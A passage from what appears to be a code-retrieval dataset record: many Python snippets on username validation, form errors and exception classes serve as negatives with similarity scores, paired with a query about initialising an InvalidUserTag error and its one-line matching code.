expect_error(register, InputError, bot.username, \"abcdef\", \"a\", \"a\", \"a\")", "def get_username_existence_validation_error(username, api_version='v1'):\n return _validate(_validate_username_doesnt_exist, errors.AccountUsernameAlreadyExists, username, api_version)", "def test_username_nodigits(self):\n response = self.signup_a_user(self.username_nodigits)\n self.assertEqual(response.data['errors']['username'],\n [\"username is invalid\"]\n )\n self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)", "def validate_username(username):\r\n\r\n\t\tmin_username_length = 3\r\n\t\tstats = 'valid'\r\n\r\n\t\tif len(username) < min_username_length:\r\n\t\t\tstats = 'invalid'\r\n\t\telif re.match(\"^[a-zA-Z0-9_-]+$\", username) is None:\r\n\t\t\tstats = 'invalid'\r\n\t\telse:\r\n\t\t\tuser = AuthTools.get_user_by_username(username)\r\n\r\n\t\t\tif user is not None:\r\n\t\t\t\tstats = 'taken'\r\n\r\n\t\treturn stats", "def validate_username(self, username_field):\n if User.get_by_username(username_field.data):\n raise ValidationError('This username is already taken.')", "def validate_username(self, username_field):\n\n if User.query.filter_by(username=username_field.data).first():\n raise ValidationError(\"This username is already taken.\")", "def test_user_cannot_register_with_invalid_username(self):\n response = self.client.post(SIGNUP_URL,\n data=json.dumps(\n {'username': '#_danny', 'email': 'danny@gmail.com', 'password': 'pass12345'}),\n content_type='application/json')\n self.assertEqual(response.status_code, 400)\n result = json.loads(response.data.decode())\n self.assertEqual(result[\"message\"], \"Invalid username\")", "def validate_username(self, field):\n if User.query.filter_by(username=field.data).first():\n raise ValidationError(\"Username already in use.\")", "def test_auth_user_fail_bad_username(self):\n\n self.assertFalse(User.authenticate(\"invalid\", \"allison\"))", "def clean_username(self):\n username = self.cleaned_data['username']\n\n try:\n User.objects.get(username=username)\n except ObjectDoesNotExist:\n return username\n\n raise forms.ValidationError('Login is already in use.')", "def clean_username(self):\r\n try:\r\n user = User.objects.get(username__iexact=self.cleaned_data['username'])\r\n except User.DoesNotExist:\r\n return self.cleaned_data['username']\r\n raise forms.ValidationError(_(u'This username is already taken. Please choose another.'))", "def username_validation(username):\n errors = []\n #Check if Username exists\n if(username_present(username)):\n errors.append(\"Användarnamnet finns redan.\")\n #Username needs to be longer then 3 chars\n if(len(username) <= 3):\n errors.append(\"Användarnamnet mäste vara 3 tecken eller längre.\")\n\n return errors", "def __init__(self, error_type: str):\n self.message = ''\n\n if error_type == 'length':\n self.message = 'Password must be between 6 and 100 characters long'\n\n elif error_type == 'one_lower':\n self.message = 'Password must contain at least one lowercase letter'\n\n elif error_type == 'one_upper':\n self.message = 'Password must contain at least one uppercase letter'\n\n elif error_type == 'one_digit':\n self.message = 'Password must contain at least one number'\n\n logging.error(str(self))\n super().__init__(self.message)", "def username_format(self, username_format):\n\n self._username_format = username_format", "def validateUsername(username):\n\n if not(username):\n return \"You must specify your archive.org username.\"", "def validate_username(username):\n if not username or not isinstance(username, str) or len(username) > 80:\n return {'error': 'invalid username: %s (%s), valid value string 1 to 80 characters, mandatory' % (username, pythonTypeToJSONType(username))}\n q = User.query.filter_by(username = username).first()\n if q:\n return {'error': 'username %s is in use' % username}\n else:\n return None", "def clean_username(self):\n username = self.cleaned_data['username']\n\n try:\n User.objects.get(email=username)\n except ObjectDoesNotExist:\n raise forms.ValidationError('Selected user does not exist.')\n\n return username", "def clean_username(self):\n username = self.cleaned_data['username']\n if User.objects.filter(username=username):\n raise forms.ValidationError('Nombre de usuario ya registrado.')\n return username", "def clean_username(self):\n username = self.cleaned_data['username']\n if User.objects.filter(username=username):\n raise forms.ValidationError('Nombre de usuario ya registrado.')\n return username", "def _validate_username_doesnt_exist(username, api_version='v1'):\n if api_version == 'v1':\n error_message = accounts.USERNAME_CONFLICT_MSG.format(username=username)\n else:\n error_message = accounts.AUTHN_USERNAME_CONFLICT_MSG\n if username is not None and username_exists_or_retired(username):\n raise errors.AccountUsernameAlreadyExists(_(error_message)) # lint-amnesty, pylint: disable=translation-of-non-string", "def test_sees_error_message_if_username_doesnt_exist(self):\n response = self.app.post(\n \"/api/users/login\",\n data=json.dumps(\n dict(\n email=USER_DATA[\"email\"] + \"x\",\n password=USER_DATA[\"credential1\"],\n )\n ),\n content_type=\"application/json\",\n follow_redirects=True,\n )\n res = response.data.decode(\"ASCII\")\n res = json.loads(res)\n self.assertEqual(response.status_code, 401)\n self.assertEqual(\n res[\"message\"], \"Invalid email, Please try again\"\n )", "def validate_username(form, field):\n\n user = User.query.filter_by(username=form.username.data).first()\n\n if user and not user == g.user:\n form.username.errors = [\n \"Username already taken!\",\n *form.username.errors\n ]\n raise ValidationError", "def __init__(self, username):\n log.info(\"Initialising user \" + username)\n self.__username = username\n self.__passwd_change_token = ''\n self.__request_header = {'content-type': 'application/json'}", "def test_invalid_username():\n expect_error(edit, InputError, \"aaa\", 1, True, None, None)", "def clean_username(self):\n username = self.cleaned_data.get(\"username\")\n if User.objects.filter(username=username).exists():\n LOGGER.warning(\"username already exists\", username=username)\n raise ValidationError(_(\"Username already exists\"))\n return username", "def validate_username(self, value):\n if UserAPIModel.objects.filter(username=value).count() > 0:\n raise serializers.ValidationError('Username taken')\n return value", "def validate_username(self, value):\n if UserAPIModel.objects.filter(username=value).count() > 0:\n raise serializers.ValidationError('Username taken')\n return value", "def clean_username(self):\n\t\tusername = self.cleaned_data['username']\n\t\tif User.objects.filter(username=username):\n\t\t\traise forms.ValidationError('username de usuario ya registrado.')\n\t\treturn username", "def unique_username(cls, username):\n if not User.is_username_available(username):\n raise ValueError('Sorry, this username is already taken.')\n return username", "def __init__(self, message=None):\n if message is None:\n message = \"Game error!\"\n self.__message = message", "def clean_username(self):\n username = self.cleaned_data.get(\"username\")\n if username.lower() != slugify(username).lower():\n raise forms.ValidationError(\n ugettext(\"Username can only contain letters, numbers, dashes \"\n \"or underscores.\"))\n lookup = {\"username__iexact\": username}\n try:\n User.objects.exclude(id=self.instance.id).get(**lookup)\n except User.DoesNotExist:\n return username\n raise forms.ValidationError(\n ugettext(\"This username is already registered\"))", "def clean_username(self):\n username = self.cleaned_data.get('username')\n user_exists = User.objects.filter(username=username).exists()\n\n if user_exists:\n raise forms.ValidationError(\n 'El usuario ya existe en nuestros registros.'\n )\n\n return username", "def __init__(self, message=None):\n if message is not None:\n super(CryptoritoError, self).__init__(message)\n else:\n super(CryptoritoError, self).__init__()", "def clean_username(self):\r\n username = self.cleaned_data.get(\"username\")\r\n\r\n if not username: \r\n return username\r\n\r\n \r\n if User.objects.filter(username__iexact=username).exclude(pk=self.instance.pk):\r\n raise forms.ValidationError(\"That username is already used.\")\r\n else:\r\n return username", "def test_admin_cannot_create_user_with_invalid_username(self):\n resp = self.admin_register()\n reply = self.admin_login()\n token = reply['token']\n user = dict(\n name='Summer Love',\n username='love summer',\n password='Andela8',\n role='attendant'\n )\n\n resp = self.client.post(\n '/api/v1/users',\n content_type='application/json',\n data=json.dumps(user),\n headers={'Authorization': 'Bearer {}'.format(token)}\n )\n\n reply = json.loads(resp.data.decode())\n\n self.assertEqual(reply['message'], 'Enter username in a correct string format no spaces, (johndoe)!')\n self.assertEqual(resp.status_code, 400)", "def __init__(self, error_code: int, message: str):\r\n self.error_code: int = error_code\r\n self.message: str = message\r\n super(ImageUnaccesible, self).__init__(self.error_code,\r\n f'{self.error_code} ---> \\\r\n {self.message}')", "def is_allowed_username(username):\n if not is_filled_username(username):\n return \"Username is a required field.\"\n elif not is_regex_username(username):\n return \"Username must be 3-20 characters, using letters or numbers.\"\n elif is_numeric_username(username):\n return \"Username must contain at least one letter.\"\n elif exists_username(username):\n return \"Username already in use.\"\n else:\n return \"\"", "def username(self, username: str):\n\n self._username = username", "def __init__(self, data_file_name: str, message: str) -> None:\n\n super().__init__(\n \"Invalid data error. \"\n \"The file '{}' contained data of the wrong format: {}\".format(\n data_file_name, message\n )\n )", "def __init__(self, message_id: str, error_code: str):\n super().__init__(f\"Command failed: {error_code}\")\n self.message_id = message_id\n self.error_code = error_code", "def clean_username(self):\n data = self.cleaned_data['username']\n if '@' in data or '|' in data or ' ' in data or '+' in data:\n raise forms.ValidationError(_(u'Usernames should not have special characters.'))\n try:\n user = User.objects.get(username__exact=self.cleaned_data['username'])\n except User.DoesNotExist:\n return self.cleaned_data['username']\n raise forms.ValidationError(_(u'This username is already taken. Please choose another.'))", "def __init__(self, message=\"\"):\n super(ValidationError, self).__init__(message)", "def validate_username(form, field):\n if User.query.filter_by(username=form.username.data).first():\n form.username.errors.append(\"Username already taken!\")\n raise ValidationError", "def check_username(username):\n\n try:\n message = (\n 'Validating submitted username.'\n )\n logger.info(message)\n invalid = (\n not username.isalnum()\n )\n if invalid:\n raise PlantalyticsDataException(USER_INVALID)\n exists = cassy.check_username_exists(username)\n if exists:\n raise PlantalyticsDataException(USER_TAKEN)\n message = (\n 'Submitted username successfully validated.'\n )\n logger.info(message)\n except PlantalyticsException as e:\n raise e\n except Exception as e:\n raise e", "def validate_username(request):\r\n # get submitted username.\r\n username = request.GET.get('username', None)\r\n if request.user.username:\r\n # check if an account with this username already exists, in case of editing user's profile.\r\n is_username_taken = User.objects.filter(username__iexact=username).exclude(username__iexact=request.user.username).exists()\r\n else:\r\n # check if an account with this username already exists, in case of registering new user.\r\n is_username_taken = User.objects.filter(username__iexact=username).exists()\r\n data = {'is_username_taken':is_username_taken}\r\n if data['is_username_taken']:\r\n data['error_message'] = 'An account with this Username already exists.'\r\n return JsonResponse(data)", "def __init__(self, username):\n self.username = username", "def test_authenticate_just_username(self):\n \n self.assertRaises(\n ValueError, \n self.authenticator.authenticate, \n username=u'thruflo'\n )", "def clean_username(self):\n username = self.cleaned_data['username']\n # Lo que hace es buscar los usarios que tengan ese username,\n # devuelve un True o False gracias al metodo *.exists()*\n username_taken = User.objects.filter(username=username).exists()\n \n if username_taken:\n # Ya Django sube la excepción hasta el nivel del HTML\n raise forms.ValidationError('Username is already in use.')\n return username", "def test_user_signup_with_invalid_first_name(self):\n pass", "def clean_username(self):\n if self.edit_user is None:\n # checks for alnum and that this user doesn't already exist\n return super(RegisterUserForm, self).clean_username()\n # just checks for alnum\n if not self.cleaned_data['username'].isalnum():\n raise forms.ValidationError(_(u'Please enter a username containing only letters and numbers.'))\n return self.cleaned_data['username']", "def validate_username(test_string: str) -> bool:\n if USERNAME_REGEX.match(test_string) is not None:\n return True\n session[\"last_error\"] = \"That's not a valid username.\"\n return False", "def test_register_user_with_invalid_username(self):\n login = self.client.post(\"api/v2/login\",content_type = 'application/json',data = json.dumps(self.admin_login))\n created_token = json.loads(login.data.decode())[\"token\"]\n new_user = self.client.post('/api/v2/signup',data = json.dumps(self.register_user_with_invalid_username),content_type = 'application/json',headers =dict(Authorization = \"Bearer{}\".format(created_token))) \n result = json.loads(new_user.data.decode())\n self.assertEqual(result ['message'], \"username must be a string\")\n self.assertEqual(new_user.status_code, 400)", "def check_auth_none(self, username):\n return AUTH_FAILED", "def test_user_cannot_register_with_short_username(self):\n response = self.client.post(SIGNUP_URL,\n data=json.dumps(\n {'username': 'dan', 'email': 'oti@gmail.com', 'password': 'pass12345'}),\n content_type='application/json')\n self.assertEqual(response.status_code, 400)\n result = json.loads(response.data.decode())\n self.assertEqual(result[\"message\"],\n \"Username should be atleast 4 characters\")", "def __init__(self, error_msg):\n super(SdkException, self).__init__()\n self.error_msg = error_msg", "def test_create_user_invalid_username(self):\r\n print(\"Create user invalid username (already taken)\")\r\n u_id = 3\r\n username = \"100\"\r\n password = \"test9999\"\r\n u_type = 1\r\n\r\n prev_noUsers = len(User.query.all())\r\n self.assertEqual(self.system.create_user(u_id, username, password, u_type), 0)\r\n curr_noUsers = len(User.query.all())\r\n self.assertEqual(prev_noUsers, curr_noUsers)", "def clean_username(self):\n existing = UserModel().objects.filter(username__iexact=self.cleaned_data['username'])\n if existing.exists():\n raise forms.ValidationError(_(\"A user with that username already exists.\"))\n else:\n return self.cleaned_data['username']", "def clean_username(self):\n existing = User.objects.filter(username__iexact=self.cleaned_data['username'])\n if existing.exists():\n raise forms.ValidationError(_(\"This username is already taken.\"))\n else:\n return self.cleaned_data['username']", "def __init__(self, exception, message=\"Invalid requests parse!\"):\n self.message = message\n self.exception = exception\n super().__init__(self.message)", "def test_register_with_invalid_username(self):\n self.response = self.client.post(\n \"/api/users/\",\n {\"user\": {\n \"username\": \"&*@#$\",\n \"email\": 'kakecom@gmail.com',\n \"password\": \"irquoa12345678\",\n }\n },\n format=\"json\"\n )\n self.assertEqual(self.response.status_code, status.HTTP_400_BAD_REQUEST)\n self.assertEqual('Invalid Username , it contains invalid characters.',\n self.response.json()['errors']['error'][0])", "def username(self, username):\n self._username = username\n return self", "def __init__(\n self,\n first_name,\n last_name,\n username,\n age,\n location):\n self.first_name = first_name\n self.last_name = last_name\n self.username = username\n self.age = age\n self.location = location\n self.login_attempts = 0", "def _load_from_text(self, text):\n self.code = \"Error\"\n self.message = text", "def test_incomplete_user_exception(self):\n u_username_only = User(username=\"incomplete_user\")\n with self.assertRaises(TypeError) as err:\n User.signup(u_username_only)", "def username(self, username):\n\n self._username = username", "def username(self, username):\n\n self._username = username", "def username(self, username):\n\n self._username = username", "def username(self, username):\n\n self._username = username", "def username(self, username):\n\n self._username = username", "def username(self, username):\n\n self._username = username", "def username(self, username):\n\n self._username = username", "def username(self, username):\n\n self._username = username", "def username(self, username):\n\n self._username = username", "def __init__(self, message, text=None, reference=None, contact=None):\n self.openid_message = message\n self.reference = reference\n self.contact = contact\n assert type(message) not in [str, str]\n Exception.__init__(self, text)", "def test_user_empty_username(self):\n data = json.dumps({\n \"username\" : \"\", \"email\" : \"emptyusername@gmail.com\",\n \"password\" : \"12345678\", \"confirm_password\" : \"12345678\"})\n response = self.app.post(\n '/api/v3/users', data=data,\n content_type='application/json',\n headers=self.admin_header)\n self.assertEqual(response.status_code, 400)", "def test_signup_missing_username(self):\n\n invalid_u = User.signup(\"test@test.com\", None, \"testpass\", \"Test\", \"User\", None)\n \n uid = 99999\n invalid_u.id = uid\n\n with self.assertRaises(exc.IntegrityError) as context:\n db.session.commit()", "def check_user(msg):\n if \"Error\" in msg:\n raise ValueError('User already exists.')", "def test_login_form_username_length():\n creds = {\"username\": \"test\"}\n form = LoginForm(data=creds)\n\n assert not form.is_valid()\n assert form.errors[\"username\"] == [\n \"Ensure this value has at least 5 characters (it has 4).\"\n ]\n\n creds = {\"username\": \"tests\"}\n form = LoginForm(data=creds)\n\n assert not form.is_valid()\n assert form.errors.get(\"username\") == None", "def __init__(self, message):\n self.message = LicenseError.ERROR + message\n\n super(LicenseError, self).__init__(self.message)", "def test_create_no_username(self):\n\n # If there is no username, email will be used instead\n properties = self.portal.portal_properties.site_properties\n properties.manage_changeProperties(use_email_as_login=True)\n\n user = api.user.create(\n email='chuck@norris.org',\n password='secret'\n )\n\n self.assertEquals(user.getUserName(), 'chuck@norris.org')\n\n # But if using emails as a username is disabled, we should get\n # an error\n properties.manage_changeProperties(use_email_as_login=False)\n\n self.assertRaises(\n ValueError,\n api.user.create,\n email='chuck@norris.org', password='secret'\n )", "def __init__(self, message=\"\"):\n super(ApplicationError, self).__init__(message)", "def test_long_username():\n expect_error(register, InputError,\n \"a\" * (MAX_USERNAME + 1), \"abcdef\", \"a\", \"a\", \"a\")", "def test_registeration_no_username(self):\n response = self.signup_a_user(self.user_lacks_username)\n self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)\n self.assertNotIn(\"token\", response.data)", "def test_unique_username(self):\n user = User(name=\"thealphadollar\")\n g.db.add(user)\n g.db.commit()\n\n user_field = Field(\"thealphadollar\")\n\n with self.assertRaises(ValidationError):\n unique_username(None, user_field)", "def error_message(self, error_message: str):\n\n self._error_message = error_message", "def test_email_username_validator(self):\n # Test with good data\n validator = self.validator.username_email_validator\n resp = validator('moracha', 'moracha@gmail.com',\n mock_data['user_dets'])\n self.assertTrue(resp)\n # Test with bad data\n # Registered username\n resp = validator(mock_data['reg_usernm'],\n 'moracha@gmail.com', mock_data['user_dets'])\n self.assertEqual(resp, \"Username already taken\")\n # Registered email\n resp = validator(\n 'moracha', mock_data['reg_email'], mock_data['user_dets'])\n self.assertEqual(resp, \"Email already used to register\")\n # invalid email\n resp = validator(\n 'moracha', mock_data['bad_email'], mock_data['user_dets'])\n self.assertEqual(resp, \"Email invalid\")\n # username less than four characters\n resp = validator('moa', 'josh@gmail.com', mock_data['user_dets'])\n self.assertEqual(resp, \"Username cannot be less than four characters\")\n # username with characters\n resp = validator(mock_data['space_usnm'],\n 'josh@gmail.com', mock_data['user_dets'])\n self.assertEqual(resp, \"Username cannot have spaces\")\n # username starting with number\n resp = validator('5mvdfg', 'josh@gmail.com', mock_data['user_dets'])\n self.assertEqual(resp, \"Username must start with a letter\")\n # Username with wrong characters\n resp = validator('gtftas%$', 'josh@gmail.com', mock_data['user_dets'])\n self.assertEqual(resp, \"Username cannot have this characters: @*#%!&$\")", "def api_auth_validate_username():\n form = request.get_json(force=True)\n if \"username\" not in form:\n raise \"username is required\"\n return jsonify(\n userProvider.validate_username(\n form['username'].encode('utf8')\n )\n )", "def username_not(self, username_not):\n\n self._username_not = username_not", "def username_not(self, username_not):\n\n self._username_not = username_not", "def test_valid_username(self):\n self.valid_username = {'user': {\n \"username\": \"1@1#%^()+\",\n \"email\": \"remmytest.com\",\n \"password\": \"Password123\"\n }}\n\n response = self.client.post(\n self.reg_url,\n self.valid_username,\n format=\"json\")\n self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)\n self.assertIn(b\"can only contain letters, numbers, -, _\",\n response.content)", "def testAddEmptyUsername(self):\n self.assertEquals(models.ERR_BAD_USERNAME, self.users.add(\"\", \"password\"))", "def __init__(self, from_email):\n self.code = 400\n self.from_email = from_email\n Error.__init__(self)" ]
[ "0.7104705", "0.6829881", "0.6761184", "0.6483541", "0.6251707", "0.6137439", "0.60849506", "0.6066154", "0.60328996", "0.60174", "0.5974511", "0.59486985", "0.59322745", "0.59095454", "0.5881767", "0.5851913", "0.58311576", "0.5790885", "0.5769815", "0.57687426", "0.57497245", "0.5744424", "0.5712758", "0.5700058", "0.56841946", "0.56777173", "0.56563014", "0.56563014", "0.5650253", "0.5641551", "0.5640195", "0.56298876", "0.56115496", "0.5605819", "0.5599938", "0.5599938", "0.5580361", "0.55785245", "0.5561871", "0.55469126", "0.5528389", "0.5518515", "0.55132747", "0.55101526", "0.5507707", "0.5487107", "0.54831547", "0.54806966", "0.5475938", "0.546315", "0.5462696", "0.5456079", "0.5447813", "0.5436663", "0.539663", "0.5381751", "0.53736395", "0.5371608", "0.5367421", "0.5337491", "0.5337292", "0.5334696", "0.53300405", "0.5327275", "0.5310032", "0.53061116", "0.53040034", "0.52788675", "0.52788496", "0.52753204", "0.52698284", "0.5264572", "0.525887", "0.52585316", "0.52585316", "0.52585316", "0.52585316", "0.52585316", "0.52585316", "0.52585316", "0.52585316", "0.52585316", "0.5258146", "0.5258141", "0.52571297", "0.52547735", "0.52542603", "0.52448565", "0.52289563", "0.52262574", "0.52262473", "0.521259", "0.5209038", "0.5207206", "0.52067834", "0.52062374", "0.52011985", "0.52011985", "0.51964784", "0.5195797", "0.51923656" ]
0.0
-1
Initializes InvalidUserTag with an error message.
def __init__(self, msg): self.msg = msg
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def error(tag, message=None):\n Log._post(\"error\", tag, message)", "def __init__(self, message=\"\"):\n super(ValidationError, self).__init__(message)", "def __init__(self, error_msg):\n super(SdkException, self).__init__()\n self.error_msg = error_msg", "def __init__(self, message, text=None, reference=None, contact=None):\n self.openid_message = message\n self.reference = reference\n self.contact = contact\n assert type(message) not in [str, str]\n Exception.__init__(self, text)", "def __init__(self, error_code: int, message: str):\r\n self.error_code: int = error_code\r\n self.message: str = message\r\n super(ImageUnaccesible, self).__init__(self.error_code,\r\n f'{self.error_code} ---> \\\r\n {self.message}')", "def __init__(self, message=None):\n if message is not None:\n super(CryptoritoError, self).__init__(message)\n else:\n super(CryptoritoError, self).__init__()", "def __init__(self, message=\"\"):\n super(ApplicationError, self).__init__(message)", "def __init__(self, exception, message=\"Invalid requests parse!\"):\n self.message = message\n self.exception = exception\n super().__init__(self.message)", "def __init__(self, error_message: str=None, error_code: int=None): # noqa: E501\n self.swagger_types = {\n 'error_message': str,\n 'error_code': int\n }\n\n self.attribute_map = {\n 'error_message': 'error_message',\n 'error_code': 'error_code'\n }\n\n self._error_message = error_message\n self._error_code = error_code", "def error(self, message):\r\n self._construct_partial_parser().error(message)", "def validate_tag(self, tag_field):\n if not tag_field.data or tag_field.data == '':\n raise ValidationError('All users must be tagged')\n return True", "def add_error(self, request, message):\n\n ParameterErrorMessage(request, self, message)", "def parse_error(self, message, exc_cls=VisualizerParseError):\n raise exc_cls(\"Error parsing %s '%s' (%s:%i): %s\" % \n (self.tag, self.ref, self.filename, self.lineno, message))", "def username_error(self, msg):\n raise NotImplementedError('username_error')", "def test_parse_tags_invalid(self):\n tagstring = \"tag1, tag2, tag3!\"\n\n with self.assertRaisesRegexp(Exception, \"invalid tag 'tag3!': only numbers, letters, and commas are \"\n \"allowed in tags\"):\n api.parse_tags(tagstring)", "def __init__(self, message=None):\n if message is None:\n message = \"Game error!\"\n self.__message = message", "def on_init_fail(self, event_time, message):\n pass", "def error_message(self, error_message: str):\n\n self._error_message = error_message", "def __init__(self, error_type: str):\n self.message = ''\n\n if error_type == 'length':\n self.message = 'Password must be between 6 and 100 characters long'\n\n elif error_type == 'one_lower':\n self.message = 'Password must contain at least one lowercase letter'\n\n elif error_type == 'one_upper':\n self.message = 'Password must contain at least one uppercase letter'\n\n elif error_type == 'one_digit':\n self.message = 'Password must contain at least one number'\n\n logging.error(str(self))\n super().__init__(self.message)", "def __init__(self, message_id: str, error_code: str):\n super().__init__(f\"Command failed: {error_code}\")\n self.message_id = message_id\n self.error_code = error_code", "def __init__(self, message, code=None, params=None):\n super().__init__(message, code, params)\n\n if isinstance(message, ValidationError):\n if hasattr(message, 'error_dict'):\n message = message.error_dict\n elif not hasattr(message, 'message'):\n message = message.error_list\n else:\n message, code, params = message.message, message.code, message.params\n\n if isinstance(message, dict):\n self.error_dict = {}\n for field, messages in message.items():\n if not isinstance(messages, ValidationError):\n messages = ValidationError(messages)\n self.error_dict[field] = messages.error_list\n\n elif isinstance(message, list):\n self.error_list = []\n for message in message:\n # Normalize plain strings to instances of ValidationError.\n if not isinstance(message, ValidationError):\n message = ValidationError(message)\n if hasattr(message, 'error_dict'):\n self.error_list.extend(sum(message.error_dict.values(), []))\n else:\n self.error_list.extend(message.error_list)\n\n else:\n self.message = message\n self.code = code\n self.params = params\n self.error_list = [self]", "def __init__(self, from_email):\n self.code = 400\n self.from_email = from_email\n Error.__init__(self)", "def __init__(self, message=\"\"):\n super(DataError, self).__init__(message)", "def error(self, message, token=None):\n raise ParseException(\n message,\n self.filename,\n line=self._line,\n line_number=self._line_number,\n token=token)", "def __init__(self, data_file_name: str, message: str) -> None:\n\n super().__init__(\n \"Invalid data error. \"\n \"The file '{}' contained data of the wrong format: {}\".format(\n data_file_name, message\n )\n )", "def __init__(self, msg):\n super(F5CcclSchemaError, self).__init__(msg)\n self.msg = 'Schema provided is invalid: ' + msg", "def __init__(\n self, created_at, started_at=None, stopped_at=None, messages=None\n ):\n super(StateError, self).__init__(\n type_id=STATE_ERROR,\n created_at=created_at\n )\n self.started_at = started_at if started_at is not None else created_at\n self.stopped_at = stopped_at if stopped_at is not None else utc_now()\n self.messages = messages if messages is not None else list()", "def test_user_register_bad_request(self):\n response = self.client.post(\n CONSTS.USER_REGISTER_URL,\n data=self.invalid_user_data,\n format='json'\n )\n self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)", "def __init__(self, error = ''):\n IPRO_Error.__init__(self, error)", "def __init__(self, error = ''):\n IPRO_Error.__init__(self, error)", "def __init__(self, error = ''):\n IPRO_Error.__init__(self, error)", "def __init__(self, message):\n self.message = LicenseError.ERROR + message\n\n super(LicenseError, self).__init__(self.message)", "def test_create_tag_invalid(self):\n tag_data = {'name': ''}\n res = self.client.post(TAGS_URL, data=tag_data)\n\n self.assertEqual(res.status_code, status.HTTP_400_BAD_REQUEST)", "def __init__(self, msg):\n\n super(DBValueError, self).__init__(msg)\n self.msg = msg", "def error_message(self, error_message):\n\n self._error_message = error_message", "def validate_tag(tag=None):\n if not tag:\n raise AttributeError('Tag cannot be empty')\n\n if tag not in TAGS:\n raise ValueError('{0} tag is not supported')", "def error(self, tag, message, exc_info=False):\n \n self.log(logging.error,tag, message, exc_info)", "def __init__(self, message):\n logging.error(\"ERROR: {0}\".format(message))\n logging.error(\"Try running with --help for more information.\")", "def _validate_template(self, template):\r\n index = template.find(COURSE_EMAIL_MESSAGE_BODY_TAG)\r\n if index < 0:\r\n msg = 'Missing tag: \"{}\"'.format(COURSE_EMAIL_MESSAGE_BODY_TAG)\r\n log.warning(msg)\r\n raise ValidationError(msg)\r\n if template.find(COURSE_EMAIL_MESSAGE_BODY_TAG, index + 1) >= 0:\r\n msg = 'Multiple instances of tag: \"{}\"'.format(COURSE_EMAIL_MESSAGE_BODY_TAG)\r\n log.warning(msg)\r\n raise ValidationError(msg)\r\n # TODO: add more validation here, including the set of known tags\r\n # for which values will be supplied. (Email will fail if the template\r\n # uses tags for which values are not supplied.)\r", "def test_create_tag_invalid(self):\n payload = {'name': ''}\n res = self.client.post(TAGS_URL, payload)\n\n self.assertEqual(res.status_code, status.HTTP_400_BAD_REQUEST)", "def __init__(self, username: str) -> None:\n try:\n check_string(username, 'username', 'a-z0-9', 100)\n except IllegalParameterError as e:\n raise IllegalUsernameError(e.message) from e\n self.name = username", "def check_user(msg):\n if \"Error\" in msg:\n raise ValueError('User already exists.')", "def setUserError(self, errStr):\n if self.ioLoopInst is not None:\n cmd = {'cmd': 'userError', 'error': errStr}\n self._sendMessageToWeb(cmd)\n else:\n print(\"UseError: \" + errStr)", "def test_register_user_with_empty_data(self, app):\n data = RegisterUser.random()\n setattr(data, \"username\", None)\n res = app.register.register(\n data=data, type_response=RegisterUserResponseInvalid\n )\n assert res.status_code == 400\n assert res.data.message == ResponseText.MESSAGE_REGISTER_USER_INVALID", "def set_tag(tag, message):\n if not verify_tag(tag):\n subprocess.run(\n [\"git\", \"tag\", \"--annotate\", tag, f'--message=\"{message}\"'],\n check=True,\n )", "def test_user_cannot_register_with_invalid_username(self):\n response = self.client.post(SIGNUP_URL,\n data=json.dumps(\n {'username': '#_danny', 'email': 'danny@gmail.com', 'password': 'pass12345'}),\n content_type='application/json')\n self.assertEqual(response.status_code, 400)\n result = json.loads(response.data.decode())\n self.assertEqual(result[\"message\"], \"Invalid username\")", "def test_create_tag_invalid(self):\n payload = {'name': ''}\n res = self.client.post(TAGS_URL, payload)\n self.assertEqual(res.status_code, status.HTTP_400_BAD_REQUEST)", "def for_tag(self, tag):\n if not isinstance(tag, str):\n raise TypeError('Tag must be a string')\n\n self.token['requiredTag'] = tag\n\n return self", "def __init__(self, *args, **kwargs):\n\n # Construct the base instance.\n super(FilterUser, self).__init__(*args, **kwargs)\n\n # Construct a regular expression tag evaluator.\n regextag = self.thistag.find('UserRegex')\n if regextag == None:\n raise ValueError('Required tag missing: UserRegex')\n self.regex = RegexTag(regextag, re.IGNORECASE)\n\n # Get the user name.\n self.user = self.context.tokens['User']\n logger.debug('user = \"{0}\"'.format(self.user))", "def _load_from_text(self, text):\n self.code = \"Error\"\n self.message = text", "def _error(self, token, msg):\n self._interpreter.parse_error(token, msg)\n return ParseError()", "def signin_failure(request, message):\n request.user.message_set.create(message = message)\n return show_signin_view(request)", "def __init__(self, error_search=\"error\"):\n self.error_search = error_search", "def __init__(self, source, bad):\n super(RequestFormatException, self).__init__()\n self.source = source\n self.bad = bad", "def error(self, message):\n raise ArgumentParseError(message)", "def error_message(self) -> pulumi.Input[str]:\n return pulumi.get(self, \"error_message\")", "def get_username_validation_error(username):\n return _validate(_validate_username, errors.AccountUsernameInvalid, username)", "def __init__(__self__, *,\n message: Optional[pulumi.Input[str]] = None,\n type: Optional[pulumi.Input['DataSourceErrorInfoType']] = None):\n if message is not None:\n pulumi.set(__self__, \"message\", message)\n if type is not None:\n pulumi.set(__self__, \"type\", type)", "def error(self, auth_token, message):\n\n self._log(auth_token, logging.ERROR, message)", "def sign_up_failure(self, urlrequest, failure_data):\n # self.hide_loading_screen()\n # self.email_exists = False # Triggers hiding the sign in button\n print(failure_data)\n # msg = failure_data['error']['message'].replace(\"_\", \" \").capitalize()\n # # Check if the error msg is the same as the last one\n # if msg == self.sign_up_msg:\n # # Need to modify it somehow to make the error popup display\n # msg = \" \" + msg + \" \"\n # self.sign_up_msg = msg\n # if msg == \"Email exists\":\n # self.email_exists = True\n # if self.debug:\n # print(\"Couldn't sign the user up: \", failure_data)", "def __init__(self,value,message):\n ValueError.__init__(self,value,message)", "def setErrorMessage(self, errorMessage):\n self._errorMessage = errorMessage", "def error(self, key, value, context, errorclass=InvalidDataError, **values):\n msg_template = self.message_for_key(key, context)\n raise errorclass(msg_template % values, value, key=key, context=context)", "def testBinaryValueWithMissingField(self):\n objectID = uuid4()\n user = createUser(u'username', u'password', u'User', u'user@foo.org')\n namespace = createNamespace(user, u'name')\n tag = createTag(user, namespace, u'tag')\n self.assertRaises(ValueError, TagValue, user.id, tag.id, objectID,\n {'size': 123})\n self.assertRaises(ValueError, TagValue, user.id, tag.id, objectID,\n {'mime-type': 'text/html'})", "def failed(self, message=None):\n doc = {self.STATE: self.STATE_FAILED}\n\n if message:\n doc.update({self.ERROR_MESSAGE: message})\n\n self.update(doc)", "def test_register_user_with_int_username(self, app):\n data = RegisterUserInt.random()\n res = app.register.register(\n data=data, type_response=RegisterUserResponseInvalid\n )\n assert 